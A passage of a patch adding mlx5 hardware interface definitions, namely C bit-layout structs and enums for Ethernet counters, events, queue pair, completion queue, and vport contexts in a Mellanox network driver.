ether_stats_jabbers_low[0x20]; + + u8 ether_stats_collisions_high[0x20]; + + u8 ether_stats_collisions_low[0x20]; + + u8 ether_stats_pkts64octets_high[0x20]; + + u8 ether_stats_pkts64octets_low[0x20]; + + u8 ether_stats_pkts65to127octets_high[0x20]; + + u8 ether_stats_pkts65to127octets_low[0x20]; + + u8 ether_stats_pkts128to255octets_high[0x20]; + + u8 ether_stats_pkts128to255octets_low[0x20]; + + u8 ether_stats_pkts256to511octets_high[0x20]; + + u8 ether_stats_pkts256to511octets_low[0x20]; + + u8 ether_stats_pkts512to1023octets_high[0x20]; + + u8 ether_stats_pkts512to1023octets_low[0x20]; + + u8 ether_stats_pkts1024to1518octets_high[0x20]; + + u8 ether_stats_pkts1024to1518octets_low[0x20]; + + u8 ether_stats_pkts1519to2047octets_high[0x20]; + + u8 ether_stats_pkts1519to2047octets_low[0x20]; + + u8 ether_stats_pkts2048to4095octets_high[0x20]; + + u8 ether_stats_pkts2048to4095octets_low[0x20]; + + u8 ether_stats_pkts4096to8191octets_high[0x20]; + + u8 ether_stats_pkts4096to8191octets_low[0x20]; + + u8 ether_stats_pkts8192to10239octets_high[0x20]; + + u8 ether_stats_pkts8192to10239octets_low[0x20]; + + u8 reserved_0[0x280]; +}; + +struct mlx5_ifc_eth_2863_cntrs_grp_data_layout_bits { + u8 if_in_octets_high[0x20]; + + u8 if_in_octets_low[0x20]; + + u8 if_in_ucast_pkts_high[0x20]; + + u8 if_in_ucast_pkts_low[0x20]; + + u8 if_in_discards_high[0x20]; + + u8 if_in_discards_low[0x20]; + + u8 if_in_errors_high[0x20]; + + u8 if_in_errors_low[0x20]; + + u8 if_in_unknown_protos_high[0x20]; + + u8 if_in_unknown_protos_low[0x20]; + + u8 if_out_octets_high[0x20]; + + u8 if_out_octets_low[0x20]; + + u8 if_out_ucast_pkts_high[0x20]; + + u8 if_out_ucast_pkts_low[0x20]; + + u8 if_out_discards_high[0x20]; + + u8 if_out_discards_low[0x20]; + + u8 if_out_errors_high[0x20]; + + u8 if_out_errors_low[0x20]; + + u8 if_in_multicast_pkts_high[0x20]; + + u8 if_in_multicast_pkts_low[0x20]; + + u8 if_in_broadcast_pkts_high[0x20]; + + u8 if_in_broadcast_pkts_low[0x20]; + + u8 if_out_multicast_pkts_high[0x20]; + + u8 if_out_multicast_pkts_low[0x20]; + + u8 if_out_broadcast_pkts_high[0x20]; + + u8 if_out_broadcast_pkts_low[0x20]; + + u8 reserved_0[0x480]; +}; + +struct mlx5_ifc_eth_802_3_cntrs_grp_data_layout_bits { + u8 a_frames_transmitted_ok_high[0x20]; + + u8 a_frames_transmitted_ok_low[0x20]; + + u8 a_frames_received_ok_high[0x20]; + + u8 a_frames_received_ok_low[0x20]; + + u8 a_frame_check_sequence_errors_high[0x20]; + + u8 a_frame_check_sequence_errors_low[0x20]; + + u8 a_alignment_errors_high[0x20]; + + u8 a_alignment_errors_low[0x20]; + + u8 a_octets_transmitted_ok_high[0x20]; + + u8 a_octets_transmitted_ok_low[0x20]; + + u8 a_octets_received_ok_high[0x20]; + + u8 a_octets_received_ok_low[0x20]; + + u8 a_multicast_frames_xmitted_ok_high[0x20]; + + u8 a_multicast_frames_xmitted_ok_low[0x20]; + + u8 a_broadcast_frames_xmitted_ok_high[0x20]; + + u8 a_broadcast_frames_xmitted_ok_low[0x20]; + + u8 a_multicast_frames_received_ok_high[0x20]; + + u8 a_multicast_frames_received_ok_low[0x20]; + + u8 a_broadcast_frames_received_ok_high[0x20]; + + u8 a_broadcast_frames_received_ok_low[0x20]; + + u8 a_in_range_length_errors_high[0x20]; + + u8 a_in_range_length_errors_low[0x20]; + + u8 a_out_of_range_length_field_high[0x20]; + + u8 a_out_of_range_length_field_low[0x20]; + + u8 a_frame_too_long_errors_high[0x20]; + + u8 a_frame_too_long_errors_low[0x20]; + + u8 a_symbol_error_during_carrier_high[0x20]; + + u8 a_symbol_error_during_carrier_low[0x20]; + + u8 a_mac_control_frames_transmitted_high[0x20]; + + u8 a_mac_control_frames_transmitted_low[0x20]; + + u8 a_mac_control_frames_received_high[0x20]; + + u8 a_mac_control_frames_received_low[0x20]; + + u8 a_unsupported_opcodes_received_high[0x20]; + + u8 a_unsupported_opcodes_received_low[0x20]; + + u8 a_pause_mac_ctrl_frames_received_high[0x20]; + + u8 a_pause_mac_ctrl_frames_received_low[0x20]; + + u8 a_pause_mac_ctrl_frames_transmitted_high[0x20]; + + u8 a_pause_mac_ctrl_frames_transmitted_low[0x20]; + + u8 reserved_0[0x300]; +}; + +struct mlx5_ifc_cmd_inter_comp_event_bits { + u8 command_completion_vector[0x20]; + + u8 reserved_0[0xc0]; +}; + +struct mlx5_ifc_stall_vl_event_bits { + u8 reserved_0[0x18]; + u8 port_num[0x1]; + u8 reserved_1[0x3]; + u8 vl[0x4]; + + u8 reserved_2[0xa0]; +}; + +struct mlx5_ifc_db_bf_congestion_event_bits { + u8 event_subtype[0x8]; + u8 reserved_0[0x8]; + u8 congestion_level[0x8]; + u8 reserved_1[0x8]; + + u8 reserved_2[0xa0]; +}; + +struct mlx5_ifc_gpio_event_bits { + u8 reserved_0[0x60]; + + u8 gpio_event_hi[0x20]; + + u8 gpio_event_lo[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_port_state_change_event_bits { + u8 reserved_0[0x40]; + + u8 port_num[0x4]; + u8 reserved_1[0x1c]; + + u8 reserved_2[0x80]; +}; + +struct mlx5_ifc_dropped_packet_logged_bits { + u8 reserved_0[0xe0]; +}; + +enum { + MLX5_CQ_ERROR_SYNDROME_CQ_OVERRUN = 0x1, + MLX5_CQ_ERROR_SYNDROME_CQ_ACCESS_VIOLATION_ERROR = 0x2, +}; + +struct mlx5_ifc_cq_error_bits { + u8 reserved_0[0x8]; + u8 cqn[0x18]; + + u8 reserved_1[0x20]; + + u8 reserved_2[0x18]; + u8 syndrome[0x8]; + + u8 reserved_3[0x80]; +}; + +struct mlx5_ifc_rdma_page_fault_event_bits { + u8 bytes_committed[0x20]; + + u8 r_key[0x20]; + + u8 reserved_0[0x10]; + u8 packet_len[0x10]; + + u8 rdma_op_len[0x20]; + + u8 rdma_va[0x40]; + + u8 reserved_1[0x5]; + u8 rdma[0x1]; + u8 write[0x1]; + u8 requestor[0x1]; + u8 qp_number[0x18]; +}; + +struct mlx5_ifc_wqe_associated_page_fault_event_bits { + u8 bytes_committed[0x20]; + + u8 reserved_0[0x10]; + u8 wqe_index[0x10]; + + u8 reserved_1[0x10]; + u8 len[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x5]; + u8 rdma[0x1]; + u8 write_read[0x1]; + u8 requestor[0x1]; + u8 qpn[0x18]; +}; + +struct mlx5_ifc_qp_events_bits { + u8 reserved_0[0xa0]; + + u8 type[0x8]; + u8 reserved_1[0x18]; + + u8 reserved_2[0x8]; + u8 qpn_rqn_sqn[0x18]; +}; + +struct mlx5_ifc_dct_events_bits { + u8 reserved_0[0xc0]; + + u8 reserved_1[0x8]; + u8 dct_number[0x18]; +}; + +struct mlx5_ifc_comp_event_bits { + u8 reserved_0[0xc0]; + + u8 reserved_1[0x8]; + u8 cq_number[0x18]; +}; + +enum { + MLX5_QPC_STATE_RST = 0x0, + MLX5_QPC_STATE_INIT = 0x1, + MLX5_QPC_STATE_RTR = 0x2, + MLX5_QPC_STATE_RTS = 0x3, + MLX5_QPC_STATE_SQER = 0x4, + MLX5_QPC_STATE_ERR = 0x6, + MLX5_QPC_STATE_SQD = 0x7, + MLX5_QPC_STATE_SUSPENDED = 0x9, +}; + +enum { + MLX5_QPC_ST_RC = 0x0, + MLX5_QPC_ST_UC = 0x1, + MLX5_QPC_ST_UD = 0x2, + MLX5_QPC_ST_XRC = 0x3, + MLX5_QPC_ST_DCI = 0x5, + MLX5_QPC_ST_QP0 = 0x7, + MLX5_QPC_ST_QP1 = 0x8, + MLX5_QPC_ST_RAW_DATAGRAM = 0x9, + MLX5_QPC_ST_REG_UMR = 0xc, +}; + +enum { + MLX5_QPC_PM_STATE_ARMED = 0x0, + MLX5_QPC_PM_STATE_REARM = 0x1, + MLX5_QPC_PM_STATE_RESERVED = 0x2, + MLX5_QPC_PM_STATE_MIGRATED = 0x3, +}; + +enum { + MLX5_QPC_END_PADDING_MODE_SCATTER_AS_IS = 0x0, + MLX5_QPC_END_PADDING_MODE_PAD_TO_CACHE_LINE_ALIGNMENT = 0x1, +}; + +enum { + MLX5_QPC_MTU_256_BYTES = 0x1, + MLX5_QPC_MTU_512_BYTES = 0x2, + MLX5_QPC_MTU_1K_BYTES = 0x3, + MLX5_QPC_MTU_2K_BYTES = 0x4, + MLX5_QPC_MTU_4K_BYTES = 0x5, + MLX5_QPC_MTU_RAW_ETHERNET_QP = 0x7, +}; + +enum { + MLX5_QPC_ATOMIC_MODE_IB_SPEC = 0x1, + MLX5_QPC_ATOMIC_MODE_ONLY_8B = 0x2, + MLX5_QPC_ATOMIC_MODE_UP_TO_8B = 0x3, + MLX5_QPC_ATOMIC_MODE_UP_TO_16B = 0x4, + MLX5_QPC_ATOMIC_MODE_UP_TO_32B = 0x5, + MLX5_QPC_ATOMIC_MODE_UP_TO_64B = 0x6, + MLX5_QPC_ATOMIC_MODE_UP_TO_128B = 0x7, + MLX5_QPC_ATOMIC_MODE_UP_TO_256B = 0x8, +}; + +enum { + MLX5_QPC_CS_REQ_DISABLE = 0x0, + MLX5_QPC_CS_REQ_UP_TO_32B = 0x11, + MLX5_QPC_CS_REQ_UP_TO_64B = 0x22, +}; + +enum { + MLX5_QPC_CS_RES_DISABLE = 0x0, + MLX5_QPC_CS_RES_UP_TO_32B = 0x1, + MLX5_QPC_CS_RES_UP_TO_64B = 0x2, +}; + +struct mlx5_ifc_qpc_bits { + u8 state[0x4]; + u8 reserved_0[0x4]; + u8 st[0x8]; + u8 reserved_1[0x3]; + u8 pm_state[0x2]; + u8 reserved_2[0x7]; + u8 end_padding_mode[0x2]; + u8 reserved_3[0x2]; + + u8 wq_signature[0x1]; + u8 block_lb_mc[0x1]; + u8 atomic_like_write_en[0x1]; + u8 latency_sensitive[0x1]; + u8 reserved_4[0x1]; + u8 drain_sigerr[0x1]; + u8 reserved_5[0x2]; + u8 pd[0x18]; + + u8 mtu[0x3]; + u8 log_msg_max[0x5]; + u8 reserved_6[0x1]; + u8 log_rq_size[0x4]; + u8 log_rq_stride[0x3]; + u8 no_sq[0x1]; + u8 log_sq_size[0x4]; + u8 reserved_7[0x6]; + u8 rlky[0x1]; + u8 reserved_8[0x4]; + + u8 counter_set_id[0x8]; + u8 uar_page[0x18]; + + u8 reserved_9[0x8]; + u8 user_index[0x18]; + + u8 reserved_10[0x3]; + u8 log_page_size[0x5]; + u8 remote_qpn[0x18]; + + struct mlx5_ifc_ads_bits primary_address_path; + + struct mlx5_ifc_ads_bits secondary_address_path; + + u8 log_ack_req_freq[0x4]; + u8 reserved_11[0x4]; + u8 log_sra_max[0x3]; + u8 reserved_12[0x2]; + u8 retry_count[0x3]; + u8 rnr_retry[0x3]; + u8 reserved_13[0x1]; + u8 fre[0x1]; + u8 cur_rnr_retry[0x3]; + u8 cur_retry_count[0x3]; + u8 reserved_14[0x5]; + + u8 reserved_15[0x20]; + + u8 reserved_16[0x8]; + u8 next_send_psn[0x18]; + + u8 reserved_17[0x8]; + u8 cqn_snd[0x18]; + + u8 reserved_18[0x40]; + + u8 reserved_19[0x8]; + u8 last_acked_psn[0x18]; + + u8 reserved_20[0x8]; + u8 ssn[0x18]; + + u8 reserved_21[0x8]; + u8 log_rra_max[0x3]; + u8 reserved_22[0x1]; + u8 atomic_mode[0x4]; + u8 rre[0x1]; + u8 rwe[0x1]; + u8 rae[0x1]; + u8 reserved_23[0x1]; + u8 page_offset[0x6]; + u8 reserved_24[0x3]; + u8 cd_slave_receive[0x1]; + u8 cd_slave_send[0x1]; + u8 cd_master[0x1]; + + u8 reserved_25[0x3]; + u8 min_rnr_nak[0x5]; + u8 next_rcv_psn[0x18]; + + u8 reserved_26[0x8]; + u8 xrcd[0x18]; + + u8 reserved_27[0x8]; + u8 cqn_rcv[0x18]; + + u8 dbr_addr[0x40]; + + u8 q_key[0x20]; + + u8 reserved_28[0x5]; + u8 rq_type[0x3]; + u8 srqn_rmpn[0x18]; + + u8 reserved_29[0x8]; + u8 rmsn[0x18]; + + u8 hw_sq_wqebb_counter[0x10]; + u8 sw_sq_wqebb_counter[0x10]; + + u8 hw_rq_counter[0x20]; + + u8 sw_rq_counter[0x20]; + + u8 reserved_30[0x20]; + + u8 reserved_31[0xf]; + u8 cgs[0x1]; + u8 cs_req[0x8]; + u8 cs_res[0x8]; + + u8 dc_access_key[0x40]; + + u8 reserved_32[0xc0]; +}; + +struct mlx5_ifc_roce_addr_layout_bits { + u8 source_l3_address[16][0x8]; + + u8 reserved_0[0x3]; + u8 vlan_valid[0x1]; + u8 vlan_id[0xc]; + u8 source_mac_47_32[0x10]; + + u8 source_mac_31_0[0x20]; + + u8 reserved_1[0x14]; + u8 roce_l3_type[0x4]; + u8 roce_version[0x8]; + + u8 reserved_2[0x20]; +}; + +union mlx5_ifc_hca_cap_union_bits { + struct mlx5_ifc_cmd_hca_cap_bits cmd_hca_cap; + struct mlx5_ifc_odp_cap_bits odp_cap; + struct mlx5_ifc_atomic_caps_bits atomic_caps; + struct mlx5_ifc_roce_cap_bits roce_cap; + struct mlx5_ifc_per_protocol_networking_offload_caps_bits per_protocol_networking_offload_caps; + struct mlx5_ifc_flow_table_nic_cap_bits flow_table_nic_cap; + u8 reserved_0[0x8000]; +}; + +enum { + MLX5_FLOW_CONTEXT_ACTION_ALLOW = 0x1, + MLX5_FLOW_CONTEXT_ACTION_DROP = 0x2, + MLX5_FLOW_CONTEXT_ACTION_FWD_DEST = 0x4, +}; + +struct mlx5_ifc_flow_context_bits { + u8 reserved_0[0x20]; + + u8 group_id[0x20]; + + u8 reserved_1[0x8]; + u8 flow_tag[0x18]; + + u8 reserved_2[0x10]; + u8 action[0x10]; + + u8 reserved_3[0x8]; + u8 destination_list_size[0x18]; + + u8 reserved_4[0x160]; + + struct mlx5_ifc_fte_match_param_bits match_value; + + u8 reserved_5[0x600]; + + struct mlx5_ifc_dest_format_struct_bits destination[0]; +}; + +enum { + MLX5_XRC_SRQC_STATE_GOOD = 0x0, + MLX5_XRC_SRQC_STATE_ERROR = 0x1, +}; + +struct mlx5_ifc_xrc_srqc_bits { + u8 state[0x4]; + u8 log_xrc_srq_size[0x4]; + u8 reserved_0[0x18]; + + u8 wq_signature[0x1]; + u8 cont_srq[0x1]; + u8 reserved_1[0x1]; + u8 rlky[0x1]; + u8 basic_cyclic_rcv_wqe[0x1]; + u8 log_rq_stride[0x3]; + u8 xrcd[0x18]; + + u8 page_offset[0x6]; + u8 reserved_2[0x2]; + u8 cqn[0x18]; + + u8 reserved_3[0x20]; + + u8 user_index_equal_xrc_srqn[0x1]; + u8 reserved_4[0x1]; + u8 log_page_size[0x6]; + u8 user_index[0x18]; + + u8 reserved_5[0x20]; + + u8 reserved_6[0x8]; + u8 pd[0x18]; + + u8 lwm[0x10]; + u8 wqe_cnt[0x10]; + + u8 reserved_7[0x40]; + + u8 db_record_addr_h[0x20]; + + u8 db_record_addr_l[0x1e]; + u8 reserved_8[0x2]; + + u8 reserved_9[0x80]; +}; + +struct mlx5_ifc_traffic_counter_bits { + u8 packets[0x40]; + + u8 octets[0x40]; +}; + +struct mlx5_ifc_tisc_bits { + u8 reserved_0[0xc]; + u8 prio[0x4]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x100]; + + u8 reserved_3[0x8]; + u8 transport_domain[0x18]; + + u8 reserved_4[0x3c0]; +}; + +enum { + MLX5_TIRC_DISP_TYPE_DIRECT = 0x0, + MLX5_TIRC_DISP_TYPE_INDIRECT = 0x1, +}; + +enum { + MLX5_TIRC_LRO_ENABLE_MASK_IPV4_LRO = 0x1, + MLX5_TIRC_LRO_ENABLE_MASK_IPV6_LRO = 0x2, +}; + +enum { + MLX5_TIRC_RX_HASH_FN_HASH_NONE = 0x0, + MLX5_TIRC_RX_HASH_FN_HASH_INVERTED_XOR8 = 0x1, + MLX5_TIRC_RX_HASH_FN_HASH_TOEPLITZ = 0x2, +}; + +enum { + MLX5_TIRC_SELF_LB_BLOCK_BLOCK_UNICAST_ = 0x1, + MLX5_TIRC_SELF_LB_BLOCK_BLOCK_MULTICAST_ = 0x2, +}; + +struct mlx5_ifc_tirc_bits { + u8 reserved_0[0x20]; + + u8 disp_type[0x4]; + u8 reserved_1[0x1c]; + + u8 reserved_2[0x40]; + + u8 reserved_3[0x4]; + u8 lro_timeout_period_usecs[0x10]; + u8 lro_enable_mask[0x4]; + u8 lro_max_ip_payload_size[0x8]; + + u8 reserved_4[0x40]; + + u8 reserved_5[0x8]; + u8 inline_rqn[0x18]; + + u8 rx_hash_symmetric[0x1]; + u8 reserved_6[0x1]; + u8 tunneled_offload_en[0x1]; + u8 reserved_7[0x5]; + u8 indirect_table[0x18]; + + u8 rx_hash_fn[0x4]; + u8 reserved_8[0x2]; + u8 self_lb_block[0x2]; + u8 transport_domain[0x18]; + + u8 rx_hash_toeplitz_key[10][0x20]; + + struct mlx5_ifc_rx_hash_field_select_bits rx_hash_field_selector_outer; + + struct mlx5_ifc_rx_hash_field_select_bits rx_hash_field_selector_inner; + + u8 reserved_9[0x4c0]; +}; + +enum { + MLX5_SRQC_STATE_GOOD = 0x0, + MLX5_SRQC_STATE_ERROR = 0x1, +}; + +struct mlx5_ifc_srqc_bits { + u8 state[0x4]; + u8 log_srq_size[0x4]; + u8 reserved_0[0x18]; + + u8 wq_signature[0x1]; + u8 cont_srq[0x1]; + u8 reserved_1[0x1]; + u8 rlky[0x1]; + u8 reserved_2[0x1]; + u8 log_rq_stride[0x3]; + u8 xrcd[0x18]; + + u8 page_offset[0x6]; + u8 reserved_3[0x2]; + u8 cqn[0x18]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x2]; + u8 log_page_size[0x6]; + u8 reserved_6[0x18]; + + u8 reserved_7[0x20]; + + u8 reserved_8[0x8]; + u8 pd[0x18]; + + u8 lwm[0x10]; + u8 wqe_cnt[0x10]; + + u8 reserved_9[0x40]; + + u8 db_record_addr_h[0x20]; + + u8 db_record_addr_l[0x1e]; + u8 reserved_10[0x2]; + + u8 reserved_11[0x80]; +}; + +enum { + MLX5_SQC_STATE_RST = 0x0, + MLX5_SQC_STATE_RDY = 0x1, + MLX5_SQC_STATE_ERR = 0x3, +}; + +struct mlx5_ifc_sqc_bits { + u8 rlky[0x1]; + u8 cd_master[0x1]; + u8 fre[0x1]; + u8 flush_in_error_en[0x1]; + u8 reserved_0[0x4]; + u8 state[0x4]; + u8 reserved_1[0x14]; + + u8 reserved_2[0x8]; + u8 user_index[0x18]; + + u8 reserved_3[0x8]; + u8 cqn[0x18]; + + u8 reserved_4[0xa0]; + + u8 tis_lst_sz[0x10]; + u8 reserved_5[0x10]; + + u8 reserved_6[0x40]; + + u8 reserved_7[0x8]; + u8 tis_num_0[0x18]; + + struct mlx5_ifc_wq_bits wq; +}; + +struct mlx5_ifc_rqtc_bits { + u8 reserved_0[0xa0]; + + u8 reserved_1[0x10]; + u8 rqt_max_size[0x10]; + + u8 reserved_2[0x10]; + u8 rqt_actual_size[0x10]; + + u8 reserved_3[0x6a0]; + + struct mlx5_ifc_rq_num_bits rq_num[0]; +}; + +enum { + MLX5_RQC_MEM_RQ_TYPE_MEMORY_RQ_INLINE = 0x0, + MLX5_RQC_MEM_RQ_TYPE_MEMORY_RQ_RMP = 0x1, +}; + +enum { + MLX5_RQC_STATE_RST = 0x0, + MLX5_RQC_STATE_RDY = 0x1, + MLX5_RQC_STATE_ERR = 0x3, +}; + +struct mlx5_ifc_rqc_bits { + u8 rlky[0x1]; + u8 reserved_0[0x2]; + u8 vsd[0x1]; + u8 mem_rq_type[0x4]; + u8 state[0x4]; + u8 reserved_1[0x1]; + u8 flush_in_error_en[0x1]; + u8 reserved_2[0x12]; + + u8 reserved_3[0x8]; + u8 user_index[0x18]; + + u8 reserved_4[0x8]; + u8 cqn[0x18]; + + u8 counter_set_id[0x8]; + u8 reserved_5[0x18]; + + u8 reserved_6[0x8]; + u8 rmpn[0x18]; + + u8 reserved_7[0xe0]; + + struct mlx5_ifc_wq_bits wq; +}; + +enum { + MLX5_RMPC_STATE_RDY = 0x1, + MLX5_RMPC_STATE_ERR = 0x3, +}; + +struct mlx5_ifc_rmpc_bits { + u8 reserved_0[0x8]; + u8 state[0x4]; + u8 reserved_1[0x14]; + + u8 basic_cyclic_rcv_wqe[0x1]; + u8 reserved_2[0x1f]; + + u8 reserved_3[0x140]; + + struct mlx5_ifc_wq_bits wq; +}; + +enum { + MLX5_NIC_VPORT_CONTEXT_ALLOWED_LIST_TYPE_CURRENT_UC_MAC_ADDRESS = 0x0, +}; + +struct mlx5_ifc_nic_vport_context_bits { + u8 reserved_0[0x1f]; + u8 roce_en[0x1]; + + u8 reserved_1[0x760]; + + u8 reserved_2[0x5]; + u8 allowed_list_type[0x3]; + u8 reserved_3[0xc]; + u8 allowed_list_size[0xc]; + + struct mlx5_ifc_mac_address_layout_bits permanent_address; + + u8 reserved_4[0x20]; + + u8 current_uc_mac_address[0][0x40]; +}; + +enum { + MLX5_MKC_ACCESS_MODE_PA = 0x0, + MLX5_MKC_ACCESS_MODE_MTT = 0x1, + MLX5_MKC_ACCESS_MODE_KLMS = 0x2, +}; + +struct mlx5_ifc_mkc_bits { + u8 reserved_0[0x1]; + u8 free[0x1]; + u8 reserved_1[0xd]; + u8 small_fence_on_rdma_read_response[0x1]; + u8 umr_en[0x1]; + u8 a[0x1]; + u8 rw[0x1]; + u8 rr[0x1]; + u8 lw[0x1]; + u8 lr[0x1]; + u8 access_mode[0x2]; + u8 reserved_2[0x8]; + + u8 qpn[0x18]; + u8 mkey_7_0[0x8]; + + u8 reserved_3[0x20]; + + u8 length64[0x1]; + u8 bsf_en[0x1]; + u8 sync_umr[0x1]; + u8 reserved_4[0x2]; + u8 expected_sigerr_count[0x1]; + u8 reserved_5[0x1]; + u8 en_rinval[0x1]; + u8 pd[0x18]; + + u8 start_addr[0x40]; + + u8 len[0x40]; + + u8 bsf_octword_size[0x20]; + + u8 reserved_6[0x80]; + + u8 translations_octword_size[0x20]; + + u8 reserved_7[0x1b]; + u8 log_page_size[0x5]; + + u8 reserved_8[0x20]; +}; + +struct mlx5_ifc_pkey_bits { + u8 reserved_0[0x10]; + u8 pkey[0x10]; +}; + +struct mlx5_ifc_array128_auto_bits { + u8 array128_auto[16][0x8]; +}; + +struct mlx5_ifc_hca_vport_context_bits { + u8 field_select[0x20]; + + u8 reserved_0[0xe0]; + + u8 sm_virt_aware[0x1]; + u8 has_smi[0x1]; + u8 has_raw[0x1]; + u8 grh_required[0x1]; + u8 reserved_1[0x10]; + u8 port_state_policy[0x4]; + u8 phy_port_state[0x4]; + u8 vport_state[0x4]; + + u8 reserved_2[0x60]; + + u8 port_guid[0x40]; + + u8 node_guid[0x40]; + + u8 cap_mask1[0x20]; + + u8 cap_mask1_field_select[0x20]; + + u8 cap_mask2[0x20]; + + u8 cap_mask2_field_select[0x20]; + + u8 reserved_3[0x80]; + + u8 lid[0x10]; + u8 reserved_4[0x4]; + u8 init_type_reply[0x4]; + u8 lmc[0x3]; + u8 subnet_timeout[0x5]; + + u8 sm_lid[0x10]; + u8 sm_sl[0x4]; + u8 reserved_5[0xc]; + + u8 qkey_violation_counter[0x10]; + u8 pkey_violation_counter[0x10]; + + u8 reserved_6[0xca0]; +}; + +enum { + MLX5_EQC_STATUS_OK = 0x0, + MLX5_EQC_STATUS_EQ_WRITE_FAILURE = 0xa, +}; + +enum { + MLX5_EQC_ST_ARMED = 0x9, + MLX5_EQC_ST_FIRED = 0xa, +}; + +struct mlx5_ifc_eqc_bits { + u8 status[0x4]; + u8 reserved_0[0x9]; + u8 ec[0x1]; + u8 oi[0x1]; + u8 reserved_1[0x5]; + u8 st[0x4]; + u8 reserved_2[0x8]; + + u8 reserved_3[0x20]; + + u8 reserved_4[0x14]; + u8 page_offset[0x6]; + u8 reserved_5[0x6]; + + u8 reserved_6[0x3]; + u8 log_eq_size[0x5]; + u8 uar_page[0x18]; + + u8 reserved_7[0x20]; + + u8 reserved_8[0x18]; + u8 intr[0x8]; + + u8 reserved_9[0x3]; + u8 log_page_size[0x5]; + u8 reserved_10[0x18]; + + u8 reserved_11[0x60]; + + u8 reserved_12[0x8]; + u8 consumer_counter[0x18]; + + u8 reserved_13[0x8]; + u8 producer_counter[0x18]; + + u8 reserved_14[0x80]; +}; + +enum { + MLX5_DCTC_STATE_ACTIVE = 0x0, + MLX5_DCTC_STATE_DRAINING = 0x1, + MLX5_DCTC_STATE_DRAINED = 0x2, +}; + +enum { + MLX5_DCTC_CS_RES_DISABLE = 0x0, + MLX5_DCTC_CS_RES_NA = 0x1, + MLX5_DCTC_CS_RES_UP_TO_64B = 0x2, +}; + +enum { + MLX5_DCTC_MTU_256_BYTES = 0x1, + MLX5_DCTC_MTU_512_BYTES = 0x2, + MLX5_DCTC_MTU_1K_BYTES = 0x3, + MLX5_DCTC_MTU_2K_BYTES = 0x4, + MLX5_DCTC_MTU_4K_BYTES = 0x5, +}; + +struct mlx5_ifc_dctc_bits { + u8 reserved_0[0x4]; + u8 state[0x4]; + u8 reserved_1[0x18]; + + u8 reserved_2[0x8]; + u8 user_index[0x18]; + + u8 reserved_3[0x8]; + u8 cqn[0x18]; + + u8 counter_set_id[0x8]; + u8 atomic_mode[0x4]; + u8 rre[0x1]; + u8 rwe[0x1]; + u8 rae[0x1]; + u8 atomic_like_write_en[0x1]; + u8 latency_sensitive[0x1]; + u8 rlky[0x1]; + u8 free_ar[0x1]; + u8 reserved_4[0xd]; + + u8 reserved_5[0x8]; + u8 cs_res[0x8]; + u8 reserved_6[0x3]; + u8 min_rnr_nak[0x5]; + u8 reserved_7[0x8]; + + u8 reserved_8[0x8]; + u8 srqn[0x18]; + + u8 reserved_9[0x8]; + u8 pd[0x18]; + + u8 tclass[0x8]; + u8 reserved_10[0x4]; + u8 flow_label[0x14]; + + u8 dc_access_key[0x40]; + + u8 reserved_11[0x5]; + u8 mtu[0x3]; + u8 port[0x8]; + u8 pkey_index[0x10]; + + u8 reserved_12[0x8]; + u8 my_addr_index[0x8]; + u8 reserved_13[0x8]; + u8 hop_limit[0x8]; + + u8 dc_access_key_violation_count[0x20]; + + u8 reserved_14[0x14]; + u8 dei_cfi[0x1]; + u8 eth_prio[0x3]; + u8 ecn[0x2]; + u8 dscp[0x6]; + + u8 reserved_15[0x40]; +}; + +enum { + MLX5_CQC_STATUS_OK = 0x0, + MLX5_CQC_STATUS_CQ_OVERFLOW = 0x9, + MLX5_CQC_STATUS_CQ_WRITE_FAIL = 0xa, +}; + +enum { + MLX5_CQC_CQE_SZ_64_BYTES = 0x0, + MLX5_CQC_CQE_SZ_128_BYTES = 0x1, +}; + +enum { + MLX5_CQC_ST_SOLICITED_NOTIFICATION_REQUEST_ARMED = 0x6, + MLX5_CQC_ST_NOTIFICATION_REQUEST_ARMED = 0x9, + MLX5_CQC_ST_FIRED = 0xa, +}; + +struct mlx5_ifc_cqc_bits { + u8 status[0x4]; + u8 reserved_0[0x4]; + u8 cqe_sz[0x3]; + u8 cc[0x1]; + u8 reserved_1[0x1]; + u8 scqe_break_moderation_en[0x1]; + u8 oi[0x1]; + u8 reserved_2[0x2]; + u8 cqe_zip_en[0x1]; + u8 mini_cqe_res_format[0x2]; + u8 st[0x4]; + u8 reserved_3[0x8]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x14]; + u8 page_offset[0x6]; + u8 reserved_6[0x6]; + + u8 reserved_7[0x3]; + u8 log_cq_size[0x5]; + u8 uar_page[0x18]; + + u8 reserved_8[0x4]; + u8 cq_period[0xc]; + u8 cq_max_count[0x10]; + + u8 reserved_9[0x18]; + u8 c_eqn[0x8]; + + u8 reserved_10[0x3]; + u8 log_page_size[0x5]; + u8 reserved_11[0x18]; + + u8 reserved_12[0x20]; + + u8 reserved_13[0x8]; + u8 last_notified_index[0x18]; + + u8 reserved_14[0x8]; + u8 last_solicit_index[0x18]; + + u8 reserved_15[0x8]; + u8 consumer_counter[0x18]; + + u8 reserved_16[0x8]; + u8 producer_counter[0x18]; + + u8 reserved_17[0x40]; + + u8 dbr_addr[0x40]; +}; + +union mlx5_ifc_cong_control_roce_ecn_auto_bits { + struct mlx5_ifc_cong_control_802_1qau_rp_bits cong_control_802_1qau_rp; + struct mlx5_ifc_cong_control_r_roce_ecn_rp_bits cong_control_r_roce_ecn_rp; + struct mlx5_ifc_cong_control_r_roce_ecn_np_bits cong_control_r_roce_ecn_np; + u8 reserved_0[0x800]; +}; + +struct mlx5_ifc_query_adapter_param_block_bits { + u8 reserved_0[0xe0]; + + u8 reserved_1[0x10]; + u8 vsd_vendor_id[0x10]; + + u8 vsd[208][0x8]; + + u8 vsd_contd_psid[16][0x8]; +}; + +union mlx5_ifc_modify_field_select_resize_field_select_auto_bits { + struct mlx5_ifc_modify_field_select_bits modify_field_select; + struct mlx5_ifc_resize_field_select_bits resize_field_select; + u8 reserved_0[0x20]; +}; + +union mlx5_ifc_field_select_802_1_r_roce_auto_bits { + struct mlx5_ifc_field_select_802_1qau_rp_bits field_select_802_1qau_rp; + struct mlx5_ifc_field_select_r_roce_rp_bits field_select_r_roce_rp; + struct mlx5_ifc_field_select_r_roce_np_bits field_select_r_roce_np; + u8 reserved_0[0x20]; +}; + +union mlx5_ifc_eth_cntrs_grp_data_layout_auto_bits { + struct mlx5_ifc_eth_802_3_cntrs_grp_data_layout_bits eth_802_3_cntrs_grp_data_layout; + struct 